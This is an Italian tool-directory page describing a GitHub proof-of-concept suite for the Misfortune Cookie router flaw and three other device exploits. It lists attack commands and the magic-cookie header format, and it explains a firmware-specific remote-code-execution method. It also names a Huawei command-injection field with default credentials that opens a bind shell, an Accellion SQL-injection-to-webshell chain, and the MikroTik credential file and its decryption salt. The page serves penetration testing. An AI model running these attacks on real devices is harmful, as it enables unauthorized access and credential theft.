Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
misfortune-cookie — Suite PoC interattiva per CVE-2014-9222 (Misfortune Cookie) e relativi exploit per router, con moduli per rilevamento, bypass dell'autenticazione, DoS e RCE, oltre a una modalità di scansione per multiple vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/luel-4013/misfortune-cookie
Sicurezza Sistemi EmbeddedRicognizioneScanner di VulnerabilitàSicurezza IoTExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubluel-4013/misfortune-cookie

misfortune-cookie

Suite PoC interattiva per CVE-2014-9222 (Misfortune Cookie) e relativi exploit per router, con moduli per rilevamento, bypass dell'autenticazione, DoS e RCE, oltre a una modalità di scansione per multiple vulnerabilità.

Vedi Repository
9h 24m faNon ancora revisionato

Suite di PoC per CVE-2014-9222 "Misfortune Cookie"

Stack overflow nella gestione dei cookie HTTP di AllegroSoft RomPager (tutte le versioni < 4.34). Una singola richiesta non autenticata con un header Cookie: appositamente costruito corrompe la memoria. Effetti: bypass dell'autenticazione admin, DoS/riavvio e (con offset specifici del firmware) esecuzione remota di codice.

Da usare solo su hardware di tua proprietà o su cui sei esplicitamente autorizzato a testare.

Console interattiva (consigliata)

root@kitploit:~
python3 main.py                # poi imposta un target con [1]
python3 main.py http://192.168.1.1
root@kitploit:~
[1] Imposta / cambia target
[2] Rileva impronta del target
[3] Rileva vulnerabilità (sicuro, non distruttivo)
[4] Bypass dell'autenticazione (magic cookie)
[5] DoS / crash del dispositivo  (DISTRUTTIVO)
[6] Helper RCE - deriva il cookie dagli indirizzi del firmware
[7] Ricerca tabella modelli / cookie
[8] Scansione per tutte le vulnerabilità (sonda)
[A] Catena Accellion FTA (CVE-2021-27101 / 27102)
[B] Huawei HG532 (CVE-2017-17215)
[C] MikroTik WinBox (CVE-2018-14847)

Ogni azione stampa prima cosa farà; il DoS richiede di digitare YES. L'impronta per modello (realm) viene rilevata automaticamente dall'header WWW-Authenticate e confrontata con la tabella dei cookie.

Scansione (opzione 8)

[8] sonda un host contro tutte e quattro le famiglie di vulnerabilità con controlli non distruttivi e stampa quali sono raggiungibili/probabilmente vulnerabili:

root@kitploit:~
python3 scan.py http://192.168.1.1
python3 scan.py http://192.168.1.1 --winbox-port 8291 --hg532-port 37215

Poi esegui la voce di menu corrispondente ([3]/[4]/[A]/[B]/[C]) per sfruttare quella confermata.

PoC aggiuntivi (stessa console)

Oltre a Misfortune Cookie, la console include PoC per altre tre vulnerabilità comuni di dispositivi embedded/appliance:

  • [A] Accellion FTA (accellion_fta.py) - riproduce la catena UNC2546 descritta da Mandiant: recupera il segreto w1 tramite SQL injection attraverso un header Host appositamente costruito (/courier/oauth.api), poi attiva admin.pl per scrivere una webshell eval e verificala. 27103 (SSRF) / 27104 (cmd exec post-auth) sono annotate ma non esercitate di default.
  • [B] Huawei HG532 (huawei_hg532.py) - POST SOAP a /ctrlt/DeviceUpgrade_1 con $(<cmd>) in NewStatusURL, autenticazione HTTP Digest dslf-config:admin; il comando predefinito apre una shell bind telnet sulla porta 9999.
  • [C] MikroTik WinBox () - lettura file tramite directory-traversal sul protocollo WinBox; di default legge e decripta le credenziali memorizzate ( XOR).

Tutti i PoC aggiuntivi richiedono conferma esplicita nella console.

CLI standalone (stessi motori)

root@kitploit:~
python3 detect.py http://192.168.1.1                      # controllo sicuro
python3 auth_bypass.py http://192.168.1.1                 # modello rilevato automaticamente
python3 auth_bypass.py http://192.168.1.1 --restore       # riattiva l'autenticazione
python3 auth_bypass.py http://192.168.1.1 --all           # prova tutti i cookie noti
python3 auth_bypass.py http://192.168.1.1 --brute         # esaustivo (MOLTO lento, crash)
python3 dos.py http://192.168.1.1                         # crash / riavvio (DISTRUTTIVO)
python3 rce/derive_cookie.py 0x803E9A40 0x803AB30D        # indirizzi -> (num, pad)

File

Formato magic cookie

root@kitploit:~
Cookie: C<evilnum>=<pad "B" bytes><payload>;

evilnum e pad sono specifici del firmware. evilnum indicizza l'array di cookie da 0x28 byte di RomPager (C_Array + evilnum*0x28 + pad = indirizzo sovrascritto). La tabella per modello, unita da exploitdb 39739 e dal modulo Metasploit allegro_rompager_auth_bypass, si trova in common.py.

Percorso RCE

Serve un'immagine firmware esatta. Passaggi (vedi rce/README.md): estrai il rootfs con binwalk, fai reverse engineering del parser dei cookie in Ghidra per trovare il delta buffer -> $ra salvato, deriva (num, pad) con derive_cookie.py, valida lo shellcode MIPS contro un'immagine emulata con QEMU prima di toccare il target live.

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2014-9222
  • https://web.archive.org/web/20141231080506/http://mis.fortunecook.ie/
  • Metasploit: auxiliary/scanner/http/allegro_rompager_misfortune_cookie e auxiliary/admin/http/allegro_rompager_auth_bypass
  • ExploitDB 39739 (Misfortune Cookie auth remover)
Scarica lo strumento
VulnerabilitàCVECosa fa la sonda
RomPagerCVE-2014-9222Banner HTTP + versione vs 4.34
Huawei HG532CVE-2017-17215Endpoint SOAP attivo + realm Digest
MikroTik WinBoxCVE-2018-14847lettura file WinBox live (credenziali estratte)
Accellion FTACVE-2021-27101/104impronta Accellion/oauth.api
MenuCVETargetPorta
[A]CVE-2021-27101/27102Accellion FTA80
[B]CVE-2017-17215Huawei HG53237215
[C]CVE-2018-14847MikroTik WinBox8291
mikrotik_winbox.py
flash/rw/store/user.dat
md5(user + "283i4jfkai3389")
filescopo
main.pyconsole interattiva
ui.pybanner + helper UI (header/info/warn/err/success/prompt/confirm)
common.pyrilevamento impronta, builder magic-cookie, tabella per modello (num, pad)
detect.pycontrollo vulnerabilità non distruttivo (versione + canary-cookie)
scan.pysonda un target contro tutte e quattro le famiglie di vulnerabilità (opzione 8)
auth_bypass.pybypass autenticazione magic-cookie con rilevamento automatico realm
dos.pystack smash con cookie sovradimensionato -> riavvio watchdog
accellion_fta.pyCVE-2021-27101/27102 SQLi -> catena webshell
huawei_hg532.pyCVE-2017-17215 iniezione comandi SOAP
mikrotik_winbox.pyCVE-2018-14847 lettura file WinBox / dump credenziali
rce/derive_cookie.pytrasforma C_Array + indirizzo target in (num, pad)
rce/README.mdmetodologia RCE completa + matematica dello sfruttamento
rce/references/slide 31C3, whitepaper NCC, writeup demistificati, tabelle layout